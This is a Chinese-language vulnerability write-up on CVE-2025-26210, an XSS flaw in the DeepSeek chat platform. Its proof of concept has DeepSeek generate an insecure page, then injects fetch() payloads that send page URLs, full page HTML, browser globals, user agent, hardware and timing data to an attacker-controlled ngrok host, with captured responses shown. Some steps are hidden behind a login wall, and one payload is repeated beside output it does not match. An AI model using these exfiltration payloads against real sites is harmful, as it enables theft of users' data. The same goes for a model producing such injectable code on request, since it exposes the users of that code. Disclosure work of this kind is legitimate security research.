DeepSeek R1 安全漏洞CVE-2025-26210分析

DeepSeek R1是深度求索（DeepSeek）研发AI推理模型，专注数学、代码和自然语言推理等复杂任务，采用强化学习技术提升推理能力。

一、基本情况

DeepSeek-R1拥有卓越性能，在数学、代码和推理任务非常完美，采用大规模强化学习技术，仅需少量标注数据即可显著提升模型性能。

DeepSeek-R1模型完全开源，采用MIT许可协议，并开源了多个小型模型，进一步降低了AI应用门槛，并支持多模态内容生成和智能交互。

栋科技漏洞库关注到DeepSeek R1 V3.1及之前版本存在安全漏洞，该漏洞现在已经被追踪为CVE-2025-26210，漏洞CVSS 3.x 评分8.8。

二、漏洞分析

CVE-2025-26210是DeepSeek R1 V3.1及之前版本存在安全漏洞，源于未指定输入字段容易受到跨站脚本攻击，可能导致执行任意代码。

漏洞影响2025年2月1日前DeepSeek AI平台版本，从R1到最新V3.1所有版本，测试是在R1之后进行的，不能保证R1之前的版本不受影响。

DeepSeek-R1模型在chat.depeseek.com中的集成

https://api-docs.deepseek.com/news/news250120

影响范围如下：

1、攻击者可以利用AI生成的不安全代码来执行任意JavaScript

2、将恶意有效载荷直接注入生成的web应用程序提供的输入字段

3、利用AI生成的JavaScript中的不安全使用

三、POC概念验证

1、首先要求deepseek编写一个包含漏洞的网页并在平台上运行，因为平台本身可以通过上传文件或要求它编写程序来触发XSS。

2、它写了一个这样不安全的网站

管理员已设置登录后刷新可查看

3、我们可以像这样直接攻击

4、经过多次测试，我们决定尝试更深入的攻击。

管理员已设置登录后刷新可查看

5、我可以测试一下我是否能用这种方式得到cookie。

管理员已设置登录后刷新可查看

是的，它把它返回了我的machine。

6、当我在输入框中输入时

fetch('https://XXX.ngrok-free.app', {method: 'POST', body: location.href});

fetch('https://XXX.ngrok-free.app', { method: 'POST', body: JSON.stringify(window.location.href) });

管理员已设置登录后刷新可查看

7、我看到一条数据被发送回我的服务器

8、当我们尝试访问这些位置时，我们会收到403错误。这是正常的，但也会泄露nginx版本

9、以下尝试以各种攻击方法泄露当前用户系统信息

fetch('https://XXX.ngrok-free.app',{method:'POST',body:JSON.stringify({ua:navigator.userAgent,os:navigator.platform,lang:navigator.language})});

{"ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36","os":"Win32","lang":"en-US"}

10、直接读取当前用户所在的页面

fetch('https://XXX.ngrok-free.app',{method:'POST',body:document.documentElement.outerHTML});

fetch('https://XXX.ngrok-free.app', {method:'POST',body:JSON.stringify({globals:Object.keys(window)})});

{"globals":["window","self","document","name","location","customElements","history","navigation","locationbar","menubar","personalbar","scrollbars","statusbar","toolbar","status","closed","frames","length","top","opener","parent","frameElement","navigator","origin","external","screen","innerWidth","innerHeight","scrollX","pageXOffset","scrollY","pageYOffset","visualViewport","screenX","screenY","outerWidth","outerHeight","devicePixelRatio","event","clientInformation","screenLeft","screenTop","styleMedia","onsearch","isSecureContext","trustedTypes","performance","onappinstalled","onbeforeinstallprompt","crypto","indexedDB","sessionStorage","localStorage","onbeforexrselect","onabort","onbeforeinput","onbeforematch","onbeforetoggle","onblur","oncancel","oncanplay","oncanplaythrough","onchange","onclick","onclose","oncontentvisibilityautostatechange","oncontextlost","oncontextmenu","oncontextrestored","oncuechange","ondblclick","ondrag","ondragend","ondragenter","ondragleave","ondragover","ondragstart","ondrop","ondurationchange","onemptied","onended","onerror","onfocus","onformdata","oninput","oninvalid","onkeydown","onkeypress","onkeyup","onload","onloadeddata","onloadedmetadata","onloadstart","onmousedown","onmouseenter","onmouseleave","onmousemove","onmouseout","onmouseover","onmouseup","onmousewheel","onpause","onplay","onplaying","onprogress","onratechange","onreset","onresize","onscroll","onsecuritypolicyviolation","onseeked","onseeking","onselect","onslotchange","onstalled","onsubmit","onsuspend","ontimeupdate","ontoggle","onvolumechange","onwaiting","onwebkitanimationend","onwebkitanimationiteration","onwebkitanimationstart","onwebkittransitionend","onwheel","onauxclick","ongotpointercapture","onlostpointercapture","onpointerdown","onpointermove","onpointerrawupdate","onpointerup","onpointercancel","onpointerover","onpointerout","onpointerenter","onpointerleave","onselectstart","onselectionchange","onanimationend","onanimationiteration","onanimationstart","ontransitionrun","ontransitionstart","ontransitionend","ontransitioncancel","onafterprint","onbeforeprint","onbeforeunload","onhashchange","onlanguagechange","onmessage","onmessageerror","onoffline","ononline","onpagehide","onpageshow","onpopstate","onrejectionhandled","onstorage","onunhandledrejection","onunload","crossOriginIsolated","scheduler","alert","atob","blur","btoa","cancelAnimationFrame","cancelIdleCallback","captureEvents","clearInterval","clearTimeout","close","confirm","createImageBitmap","fetch","find","focus","getComputedStyle","getSelection","matchMedia","moveBy","moveTo","open","postMessage","print","prompt","queueMicrotask","releaseEvents","reportError","requestAnimationFrame","requestIdleCallback","resizeBy","resizeTo","scroll","scrollBy","scrollTo","setInterval","setTimeout","stop","structuredClone","webkitCancelAnimationFrame","webkitRequestAnimationFrame","chrome","caches","cookieStore","ondevicemotion","ondeviceorientation","ondeviceorientationabsolute","launchQueue","sharedStorage","documentPictureInPicture","getScreenDetails","queryLocalFonts","showDirectoryPicker","showOpenFilePicker","showSaveFilePicker","originAgentCluster","onpageswap","onpagereveal","credentialless","fence","speechSynthesis","onscrollend","onscrollsnapchange","onscrollsnapchanging","webkitRequestFileSystem","webkitResolveLocalFileSystemURL","trustedOrigin","varname"]}

fetch('https://XXX.ngrok-free.app', {method:'POST', body:JSON.stringify({screenInfo: {width: window.innerWidth, height: window.innerHeight, x: window.screenX, y: window.screenY}})});

{"screenInfo":{"width":758,"height":699,"x":0,"y":0}}

fetch('https://XXX.ngrok-free.app', {method:'POST', body:JSON.stringify({screenInfo: {width: window.innerWidth, height: window.innerHeight, x: window.screenX, y: window.screenY}})});

{"cpu":16,"ram":8}

管理员已设置登录后刷新可查看

{"hardwareConcurrency":16,"deviceMemory":8}

fetch('https://XXX.ngrok-free.app', {
method: 'POST',
body: JSON.stringify(performance.timing)
});

{"connectStart":1738654496434,"secureConnectionStart":1738654496476,"unloadEventEnd":0,"domainLookupStart":1738654496377,"domainLookupEnd":1738654496434,"responseStart":1738654496551,"connectEnd":1738654496512,"responseEnd":1738654496552,"requestStart":1738654496512,"domLoading":1738654496556,"redirectStart":0,"loadEventEnd":1738654496562,"domComplete":1738654496562,"navigationStart":1738654496372,"loadEventStart":1738654496562,"domContentLoadedEventEnd":1738654496562,"unloadEventStart":0,"redirectEnd":0,"domInteractive":1738654496562,"fetchStart":1738654496374,"domContentLoadedEventStart":1738654496562}

管理员已设置登录后刷新可查看

{"batteryLevel":1,"isCharging":true}

四、影响范围

deepseek-r1 1.0

deepseek-v2

deepseek-v3 1.0

五、修复建议

未知

六、参考链接

管理员已设置登录后刷新可查看